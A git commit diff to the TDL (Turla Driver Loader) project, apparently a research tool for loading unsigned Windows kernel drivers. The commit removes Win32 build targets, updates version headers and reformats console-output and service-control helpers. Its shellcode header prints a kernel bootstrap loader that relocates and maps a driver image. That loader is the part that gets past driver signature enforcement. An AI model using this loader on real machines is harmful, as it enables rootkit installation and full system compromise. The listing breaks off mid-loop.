small update
This commit is contained in:
hfiref0x 2017-04-17 18:45:41 +07:00
parent 20a4e9b210
commit 7e4aec975f
17 changed files with 1248 additions and 1295 deletions

17
.gitattributes vendored
View File

@ -1,17 +0,0 @@
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

Binary file not shown.

View File

@ -32,7 +32,7 @@ In order to build from source you need Microsoft Visual Studio 2015 U1 and later
# Authors
(c) 2016 TDL Project
(c) 2016 - 2017 TDL Project
# Credits

View File

@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}"
EndProject

View File

@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -26,19 +18,6 @@
<ProjectName>Furutaka</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
@ -57,12 +36,6 @@
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
@ -70,20 +43,10 @@
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@ -93,23 +56,6 @@
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
@ -124,30 +70,7 @@
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
<UACExecutionLevel>AsInvoker</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@ -164,6 +87,8 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>

View File

@ -4,14 +4,6 @@
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: CUI.C
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 18 Jan 2016
* DATE: 20 Mar 2017
*
* Console output.
*
@ -19,46 +19,95 @@
#include "global.h"
/*
* cuiPrintText
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
*
* ANSI variant
*
*/
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
SIZE_T consoleIO;
DWORD bytesIO;
LPSTR Buffer;
if (lpText == NULL)
return;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = _strlen_a(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
consoleIO = (5 + consoleIO);
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
_strcpy_a(Buffer, lpText);
if (UseReturn) _strcat_a(Buffer, "\r\n");
consoleIO = _strlen(Buffer);
consoleIO = _strlen_a(Buffer);
if (ConsoleOutputEnabled == TRUE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
}
if (ConsoleOutputEnabled != FALSE) {
WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextW
*
* Purpose:
*
* Output text to the console or file.
*
* UNICODE variant
*
*/
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (5 + consoleIO) * sizeof(WCHAR);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: CUI.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 18 Jan 2016
* DATE: 04 Feb 2017
*
* Common header file for console ui.
*
@ -18,11 +18,22 @@
*******************************************************************************/
#pragma once
#include "global.h"
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
#ifdef UNICODE
#define cuiPrintText cuiPrintTextW
#else
#define cuiPrintText cuiPrintTextA
#endif

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: GLOBAL.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* Common header file for the program support routines.
*

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.C
*
* VERSION: 1.11
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -25,33 +25,33 @@
*
*/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
{
SC_HANDLE schService;
SC_HANDLE schService;
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
CloseServiceHandle(schService);
return TRUE;
CloseServiceHandle(schService);
return TRUE;
}
/*
@ -63,26 +63,26 @@ BOOL scmInstallDriver(
*
*/
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL ret;
SC_HANDLE schService;
BOOL ret;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
CloseServiceHandle(schService);
CloseServiceHandle(schService);
return ret;
return ret;
}
/*
@ -94,35 +94,35 @@ BOOL scmStartDriver(
*
*/
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
{
TCHAR completeDeviceName[64];
HANDLE hDevice;
TCHAR completeDeviceName[64];
HANDLE hDevice;
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
return TRUE;
return TRUE;
}
/*
@ -134,39 +134,39 @@ BOOL scmOpenDevice(
*
*/
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
INT iRetryCount;
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus;
BOOL ret;
INT iRetryCount;
SC_HANDLE schService;
SERVICE_STATUS serviceStatus;
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
iRetryCount = 5;
do {
SetLastError(0);
iRetryCount = 5;
do {
SetLastError(0);
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret == TRUE)
break;
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret != FALSE)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
CloseServiceHandle(schService);
CloseServiceHandle(schService);
return ret;
return ret;
}
/*
@ -178,27 +178,19 @@ BOOL scmStopDriver(
*
*/
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL bResult = FALSE;
SC_HANDLE schService;
BOOL bResult = FALSE;
schService = OpenService(SchSCManager,
DriverName,
DELETE
);
if (schService == NULL) {
return bResult;
}
bResult = DeleteService(schService);
CloseServiceHandle(schService);
return bResult;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService) {
bResult = DeleteService(schService);
CloseServiceHandle(schService);
}
return bResult;
}
/*
@ -210,26 +202,23 @@ BOOL scmRemoveDriver(
*
*/
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
)
_In_ LPCTSTR Name
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
}
/*
@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver(
*
*/
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
}

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon
* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.H
*
* VERSION: 1.10
*
* DATE: 10 Mar 2015
* DATE: 17 Apr 2017
*
* Common header file for the program SCM usage.
*
@ -16,39 +16,40 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
);
_In_ LPCTSTR Name
);
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);

File diff suppressed because it is too large Load Diff

Binary file not shown.

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SHELLCODE.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 30 Jan 2016
* DATE: 17 Apr 2017
*
* Loader bootstrap shellcode.
*
@ -20,20 +20,20 @@
#pragma once
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
/*
* TDLBootstrapLoader
@ -45,101 +45,101 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
*/
/*
void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
ULONG isz = popth->SizeOfImage;
HANDLE th;
ULONG isz = popth->SizeOfImage;
HANDLE th;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
OBJECT_ATTRIBUTES attr;
OBJECT_ATTRIBUTES attr;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
isz >>= 3;
for (pos = 0; pos < isz; pos++)
